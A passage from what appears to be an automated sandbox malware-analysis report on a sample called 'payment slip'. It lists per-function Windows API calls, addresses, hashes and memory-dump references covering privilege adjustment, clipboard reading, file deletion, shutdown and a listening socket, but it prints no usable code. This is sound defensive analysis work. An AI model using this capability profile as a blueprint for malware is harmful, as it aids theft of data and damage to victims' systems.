                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
                                          • Part of subcall function 000910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                          • Part of subcall function 000910BF: CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: dcb397cfa2f8995fba71d8f4e0923f71d134a1aad081eedc5076b25b861e11f8
                                        • Instruction ID: 50745b41ef0dd2252fa9c0297fcc0c35f53a7f3b80dbeeb373ac516b2de4aaa1
                                        • Opcode Fuzzy Hash: dcb397cfa2f8995fba71d8f4e0923f71d134a1aad081eedc5076b25b861e11f8
                                        • Instruction Fuzzy Hash: 3F81BF71A0020AAFEF219FA4DC49FEE7BF9EF08704F144129FA14B61A1C7758954EB60
                                        Function 00090B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                          • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                          • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                          • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090C00
                                        • GetLengthSid.ADVAPI32(?), ref: 00090C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00090C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 00090C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 00090C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090CB4
                                        • CopySid.ADVAPI32(00000000), ref: 00090CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D45
                                        • HeapFree.KERNEL32(00000000), ref: 00090D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D55
                                        • HeapFree.KERNEL32(00000000), ref: 00090D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D65
                                        • HeapFree.KERNEL32(00000000), ref: 00090D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00090D78
                                        • HeapFree.KERNEL32(00000000), ref: 00090D7F
                                          • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                          • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                          • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                        • Instruction ID: d5dddb060d4178d8218017bdb3e3afc50268151a0e25116ef7be52758d608945
                                        • Opcode Fuzzy Hash: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                        • Instruction Fuzzy Hash: 8771697290120AAFEF10DFA5DC48FEEBBBCBF05304F144515F918A6291D775AA05DBA0
                                        Function 000AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(000CCC08), ref: 000AEB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 000AEB37
                                        • GetClipboardData.USER32(0000000D), ref: 000AEB43
                                        • CloseClipboard.USER32 ref: 000AEB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEB87
                                        • CloseClipboard.USER32 ref: 000AEB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 000AEBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 000AEBC9
                                        • GetClipboardData.USER32(00000001), ref: 000AEBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 000AEC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 000AEC38
                                        • GetClipboardData.USER32(0000000F), ref: 000AEC44
                                        • GlobalLock.KERNEL32(00000000), ref: 000AEC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AEC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 000AECF3
                                        • CountClipboardFormats.USER32 ref: 000AED14
                                        • CloseClipboard.USER32 ref: 000AED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                        • Instruction ID: db709fe28f0427819330a27a2f820508e89708a75e9ea304bed440e5a403af04
                                        • Opcode Fuzzy Hash: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                        • Instruction Fuzzy Hash: 5D61E034204341AFE311EFA4D888F6AB7E8EF85714F14451DF45A9B2A2CB75DD06CB62
                                        Function 000A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A69BE
                                        • FindClose.KERNEL32(00000000), ref: 000A6A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A75
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                        • Instruction ID: 1010464e94b6e1f5039746b3603dc656ca9ece743af2d672c2268448d7a2c8a7
                                        • Opcode Fuzzy Hash: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                        • Instruction Fuzzy Hash: 4ED160B2508300AFC315EBA0C885EABB7ECAF89704F44491DF589D7192EB75DA44CB62
                                        Function 000A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000A9663
                                        • GetFileAttributesW.KERNEL32(?), ref: 000A96A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 000A96BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A96D3
                                        • FindClose.KERNEL32(00000000), ref: 000A96DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000A96FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A974A
                                        • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A9768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9772
                                        • FindClose.KERNEL32(00000000), ref: 000A977F
                                        • FindClose.KERNEL32(00000000), ref: 000A978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                        • Instruction ID: eab9dc92875b6523a15c29596f0574120f6c62b34ac064f479ce50f7c4fa97f0
                                        • Opcode Fuzzy Hash: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                        • Instruction Fuzzy Hash: A131B3326446196AEB14EFF4EC49EEE77EC9F4A321F104155F919E2090DB34DE848F24
                                        Function 000A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000A97BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A9819
                                        • FindClose.KERNEL32(00000000), ref: 000A9824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000A9840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A9890
                                        • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A98AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A98B8
                                        • FindClose.KERNEL32(00000000), ref: 000A98C5
                                        • FindClose.KERNEL32(00000000), ref: 000A98D5
                                          • Part of subcall function 0009DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0009DB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                        • Instruction ID: daad73ee5136a16af65d732cf552373528cc7764132f700469d5b2afd078d132
                                        • Opcode Fuzzy Hash: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                        • Instruction Fuzzy Hash: 2731B2316406196AEF20EFF4EC48EEE77EC9F47321F144155E914A2191DF39DA85CB60
                                        Function 000A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 000A8257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 000A8267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000A8273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A8310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                        • Instruction ID: aadbab18307e877921e5c41c3b5c252d94dc07ad87232ce683931a1a60733ca7
                                        • Opcode Fuzzy Hash: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                        • Instruction Fuzzy Hash: 31616C725047459FDB10EF60C844EAEB3E8FF89314F04892EF98997252DB35EA45CB92
                                        Function 0009D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0009D122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0009D1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 0009D1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D237
                                          • Part of subcall function 0009D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0009D21C,?,?), ref: 0009D2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0009D253
                                        • FindClose.KERNEL32(00000000), ref: 0009D264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: 540b3e2f899dc20068ffc87381be7adbd53d70b4ca20fd9dc3cf1f58de0d3399
                                        • Instruction ID: 68a07b9260a803f0d34132b32ec99e1d497784ad96b3b4f0d6bac2e6f6d8aded
                                        • Opcode Fuzzy Hash: 540b3e2f899dc20068ffc87381be7adbd53d70b4ca20fd9dc3cf1f58de0d3399
                                        • Instruction Fuzzy Hash: FA617C3184510DABDF06EBE0DA92DEDB7B9AF55300F604166E442771A2EF30AF09DB60
                                        Function 000AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                        • Instruction ID: 52fee5a0436d58109a5c7274bc8d4bda53593e9afb5465856b973b1530663c2c
                                        • Opcode Fuzzy Hash: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                        • Instruction Fuzzy Hash: A541CD35204651AFE720CF55D888F59BBE5FF45329F14C099E45A8BA62C739EC42CB90
                                        Function 0009E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                          • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                          • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 0009E932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        • Opcode ID: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                        • Instruction ID: cc19a8983acc6c6d2992c43a49adc68e1682a102a79cc99b4026ab16e9c5d437
                                        • Opcode Fuzzy Hash: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                        • Instruction Fuzzy Hash: A501F972B10211AFFF64A7B4DC86FFF72ACA714750F150521FD13E21D2D9A55C40A190
                                        Function 000B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000B1276
                                        • WSAGetLastError.WSOCK32 ref: 000B1283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000B12BA
                                        • WSAGetLastError.WSOCK32 ref: 000B12C5
                                        • closesocket.WSOCK32(00000000), ref: 000B12F4
                                        • listen.WSOCK32(00000000,00000005), ref: 000B1303
                                        • WSAGetLastError.WSOCK32 ref: 000B130D
                                        • closesocket.WSOCK32(00000000), ref: 000B133C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                        • Instruction ID: 5b8665cc20aae47c41514f0cb18bce74db9faca1c94caa50ca62f9064ff440aa
                                        • Opcode Fuzzy Hash: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                        • Instruction Fuzzy Hash: 91417271A001009FE710DF64C494FAABBE6AF46318F588198D85A9F293C775ED85CBE1
                                        Function 0006B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0006B9D4
                                        • _free.LIBCMT ref: 0006B9F8
                                        • _free.LIBCMT ref: 0006BB7F
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                        • _free.LIBCMT ref: 0006BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                        • Instruction ID: 58d61816519d85ce935f20488a3f1af2a1fc19c34e37f810c7d72307f5f58c60
                                        • Opcode Fuzzy Hash: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                        • Instruction Fuzzy Hash: ADC106B1A04205AFDB249F78CC51AEE7BFBEF41350F2441AAE494D7252EB709E81CB50
                                        Function 0009D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0009D420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D481
                                        • FindClose.KERNEL32(00000000), ref: 0009D498
                                        • FindClose.KERNEL32(00000000), ref: 0009D4A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
